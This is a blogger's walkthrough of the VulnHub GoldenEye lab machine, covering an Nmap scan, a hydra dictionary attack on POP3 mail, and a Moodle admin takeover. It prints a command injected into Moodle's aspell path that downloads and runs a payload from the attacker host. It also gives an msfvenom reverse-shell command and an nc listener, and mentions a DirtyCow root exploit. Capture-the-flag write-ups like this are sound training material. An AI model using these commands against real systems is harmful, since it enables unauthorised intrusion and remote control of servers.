To break the boredom during the long flight. I had planned to play with machine GoldenEye from VulnHub. Not only does it challenge my skills it also helps me pass through those arduous journeys soon.
Once the .ova file was downloaded, I imported it into VirtualBox and by doing a Nmap scan for the entire network (192.168.99.100/24). It revealed the IP address assigned to the machine as 192.168.99.100. Then I did a quick Nmap scan and below are the results:
On looking at the web server it had the following message:
It gave a hint that pop3 is running on an unconventional port. Doing an intense Nmap scan gave the following result indicating that pop3 is running on port 55006 and 55007.
Nmap scan report for 192.168.99.100 Host is up (0.00041s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 25/tcp open smtp Postfix smtpd |_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu | Issuer: commonName=ubuntu | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2018-04-24T03:22:34 | Not valid after: 2028-04-21T03:22:34 | MD5: cd4a d178 f216 17fb 21a6 0a16 8f46 c8c6 |_SHA-1: fda3 fc7b 6601 4746 96aa 0f56 b126 1c29 36e8 442c |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: GoldenEye Primary Admin Server 55006/tcp open ssl/pop3 Dovecot pop3d |_pop3-capabilities: UIDL PIPELINING SASL(PLAIN) RESP-CODES USER AUTH-RESP-CODE TOP CAPA | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Issuer: commonName=localhost/organizationName=Dovecot mail server | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2018-04-24T03:23:52 | Not valid after: 2028-04-23T03:23:52 | MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63 |_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77 |_ssl-date: TLS randomness does not represent time 55007/tcp open pop3 Dovecot pop3d |_pop3-capabilities: AUTH-RESP-CODE PIPELINING RESP-CODES UIDL USER SASL(PLAIN) STLS TOP CAPA | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Issuer: commonName=localhost/organizationName=Dovecot mail server | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2018-04-24T03:23:52 | Not valid after: 2028-04-23T03:23:52 | MD5: d039 2e71 c76a 2cb3 e694 ec40 7228 ec63 |_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77 |_ssl-date: TLS randomness does not represent time
The sev-home page had the details of the GoldenEye Network Operator Supervisors names prompting to perform a dictionary attack. For those accounts on pop3, hydra came to the rescue and the password was not complex so it was easy to crack it with the word list available in Kali Linux. Checking the mails using telnet to connect to pop3 (used commands USER, PASS, STAT – to get statistics and RETR n – to retrieve message), it gave a hint that a new trainee Xenia has joined the company and she had to be given access to the application. Furthermore, the host entry ‘192.168.99.100 severnaya-station.com‘ had to be added to the ‘/etc/hosts’ file to access the application. This was required for the host headers to have ‘severnaya-station.com’. One of the emails received by Natalyn, had the login credentials for the moodle post login. It said that Xenia doesn’t have access to view the course, but there was a welcome message from Dr_dork specifying his username as ‘doak’. It was possible to crack his password and obtain his credentials from pop3 and the mail revealed a secret image. Looking for the string in the image gave a base64 encoded password and it was the admin password to the Moodle system.
To get a reverse shell, you need to follow the following steps in Moodle:
- Change the executable path of ‘spellcheck’ to run code.
- Replace the default spell check processor of TinyMCE HTML editor to ‘PSpellSpell'(as this is the one that uses the spellcheck binary used in the path)
- Changing the path variable of aspell form ‘System paths’ under Server to sh -c ‘(wget http://192.168.99.101/metershell -O /tmp/metershell; chmod +x /tmp/metershell;/tmp/metershell &)’ and save the settings
- Generate a payload from msfvenom using the command msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.99.101 LPORT=443 -f elf -o metershell replace the IP address of the machine.
- Start the webserver on port 80 either using the apache or python -m SimpleHTTPServer 80
- Start the lister for the reverse shell using the command nc -lvp 443
- Go to any page where TinyMCE is used. For example, blog and add some text and do a spell check. Doing this will get us a reverse shell like the one mentioned in the screenshot below:
The Linux kernel was running on an older version and it was vulnerable to DirtyCow. Compiling the exploit and running it gave a root shell.
Although the challenges were not too complex, it was fun getting the root shell and it kept me away from the boredom during my journey.